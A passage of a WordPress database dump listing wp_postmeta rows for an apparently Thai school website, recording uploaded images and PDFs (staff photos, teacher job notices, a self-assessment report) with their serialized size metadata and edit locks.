"94369506_1080649498977904_1028253202597806080_o-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25046, 10136, '_thumbnail_id', '10137'),
(25049, 10136, '_hide_featured', NULL),
(25052, 10141, '_wp_attached_file', '2018/10/รองผู้อำนวยการ.jpg'),
(25053, 10141, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:444;s:6:\"height\";i:603;s:4:\"file\";s:54:\"2018/10/รองผู้อำนวยการ.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:54:\"รองผู้อำนวยการ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:54:\"รองผู้อำนวยการ-221x300.jpg\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:54:\"รองผู้อำนวยการ-221x300.jpg\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25060, 10144, '_wp_attached_file', '2020/05/บริหาร.png'),
(25061, 10144, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:30:\"2020/05/บริหาร.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"บริหาร-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"บริหาร-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"บริหาร-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"บริหาร-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"บริหาร-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25062, 10146, '_edit_lock', '1623039065:14'),
(25063, 10146, '_edit_last', '14'),
(25064, 10147, '_wp_attached_file', '2020/05/130563-01.pdf'),
(25065, 10148, '_wp_attached_file', '2020/05/130563-01-1.pdf'),
(25068, 10146, '_hide_featured', NULL),
(25075, 10151, '_wp_attached_file', '2020/05/180563-01.jpg'),
(25076, 10151, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:21:\"2020/05/180563-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180563-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180563-01-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180563-01-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180563-01-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180563-01-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25077, 10153, '_edit_lock', '1589786688:14'),
(25078, 10153, '_edit_last', '14'),
(25079, 10153, '_thumbnail_id', '10151'),
(25082, 10153, '_hide_featured', NULL),
(25087, 10156, '_wp_attached_file', '2020/05/180563-02.jpg'),
(25088, 10156, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/05/180563-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180563-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180563-02-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180563-02-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25089, 10157, '_wp_attached_file', '2020/05/180563-02-1.jpg'),
(25090, 10157, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2020/05/180563-02-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"180563-02-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"180563-02-1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"180563-02-1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25091, 10158, '_wp_attached_file', '2020/05/180563-02-2.jpg'),
(25092, 10158, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2020/05/180563-02-2.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"180563-02-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"180563-02-2-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"180563-02-2-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25093, 10159, '_wp_attached_file', '2020/05/180563-02-3.jpg'),
(25094, 10159, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2020/05/180563-02-3.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"180563-02-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"180563-02-3-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"180563-02-3-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25095, 10160, '_edit_lock', '1589787042:14'),
(25096, 10160, '_edit_last', '14'),
(25097, 10160, '_thumbnail_id', '10159'),
(25100, 10160, '_hide_featured', NULL),
(25103, 10162, '_edit_lock', '1589787098:14'),
(25104, 10162, '_edit_last', '14'),
(25105, 10163, '_wp_attached_file', '2020/05/180563-03.jpg'),
(25106, 10163, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:21:\"2020/05/180563-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180563-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180563-03-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180563-03-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180563-03-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180563-03-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25107, 10162, '_thumbnail_id', '10163'),
(25110, 10162, '_hide_featured', NULL),
(25113, 10165, '_edit_lock', '1589787267:14'),
(25114, 10165, '_edit_last', '14'),
(25115, 10166, '_wp_attached_file', '2020/05/97410133_1098613687181485_5352825343096913920_o.jpg'),
(25116, 10166, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:960;s:4:\"file\";s:59:\"2020/05/97410133_1098613687181485_5352825343096913920_o.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"97410133_1098613687181485_5352825343096913920_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"97410133_1098613687181485_5352825343096913920_o-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"97410133_1098613687181485_5352825343096913920_o-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"97410133_1098613687181485_5352825343096913920_o-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"323618746018101\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25117, 10165, '_thumbnail_id', '10166'),
(25120, 10165, '_hide_featured', NULL),
(25125, 10172, '_edit_lock', '1590044171:14'),
(25126, 10173, '_wp_attached_file', '2020/05/97307220_1099367233772797_9213512153447792640_o.jpg'),
(25127, 10173, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:59:\"2020/05/97307220_1099367233772797_9213512153447792640_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"97307220_1099367233772797_9213512153447792640_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"97307220_1099367233772797_9213512153447792640_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"97307220_1099367233772797_9213512153447792640_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"97307220_1099367233772797_9213512153447792640_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"97307220_1099367233772797_9213512153447792640_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25128, 10172, '_edit_last', '14'),
(25129, 10172, '_thumbnail_id', '10173'),
(25132, 10172, '_hide_featured', NULL),
(25137, 10175, '_edit_lock', '1595471331:14'),
(25138, 10175, '_edit_last', '14'),
(25139, 10177, '_wp_attached_file', '2020/05/20200522130209396.pdf'),
(25142, 10175, '_hide_featured', NULL),
(25147, 10181, '_edit_lock', '1591341925:14'),
(25148, 10181, '_edit_last', '14'),
(25149, 10182, '_wp_attached_file', '2020/06/ประกาศรับสมัครครูอัตราจ้างการตลาด.pdf'),
(25152, 10181, '_hide_featured', NULL),
(25155, 10184, '_wp_attached_file', '2019/12/ออกแบบเชิญชวน.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(25156, 10184, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:4056;s:6:\"height\";i:2183;s:4:\"file\";s:51:\"2019/12/ออกแบบเชิญชวน.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:51:\"ออกแบบเชิญชวน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:51:\"ออกแบบเชิญชวน-300x161.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:51:\"ออกแบบเชิญชวน-768x413.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:413;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:52:\"ออกแบบเชิญชวน-1024x551.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:551;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:51:\"ออกแบบเชิญชวน-400x215.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25171, 10190, '_edit_lock', '1591073022:14'),
(25172, 10190, '_edit_last', '14'),
(25173, 10191, '_wp_attached_file', '2020/06/020663-04.jpg'),
(25174, 10191, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:21:\"2020/06/020663-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"020663-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"020663-04-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"020663-04-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"020663-04-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"020663-04-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25175, 10192, '_wp_attached_file', '2020/06/020663-03.jpg'),
(25176, 10192, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:21:\"2020/06/020663-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"020663-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"020663-03-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"020663-03-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"020663-03-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"020663-03-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25177, 10193, '_wp_attached_file', '2020/06/020663-02.jpg'),
(25178, 10193, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:21:\"2020/06/020663-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"020663-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"020663-02-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"020663-02-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"020663-02-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"020663-02-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25179, 10194, '_wp_attached_file', '2020/06/020663-01.jpg'),
(25180, 10194, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:21:\"2020/06/020663-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"020663-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"020663-01-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"020663-01-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"020663-01-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"020663-01-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25183, 10190, '_hide_featured', NULL),
(25184, 10196, '_wp_attached_file', '2019/12/050663-01.jpg'),
(25185, 10196, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1084;s:6:\"height\";i:1509;s:4:\"file\";s:21:\"2019/12/050663-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050663-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050663-01-216x300.jpg\";s:5:\"width\";i:216;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"050663-01-768x1069.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1069;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"050663-01-736x1024.jpg\";s:5:\"width\";i:736;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050663-01-216x300.jpg\";s:5:\"width\";i:216;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25188, 10199, '_edit_lock', '1591343271:14'),
(25189, 10199, '_edit_last', '14'),
(25190, 10200, '_wp_attached_file', '2020/06/รับสมัครครูเมคคาทรอนิกส์.pdf'),
(25193, 10199, '_hide_featured', NULL),
(25200, 10204, '_wp_attached_file', '2020/06/สรุปรายงานการประเมินตนเอง-62_บีบอัด.pdf'),
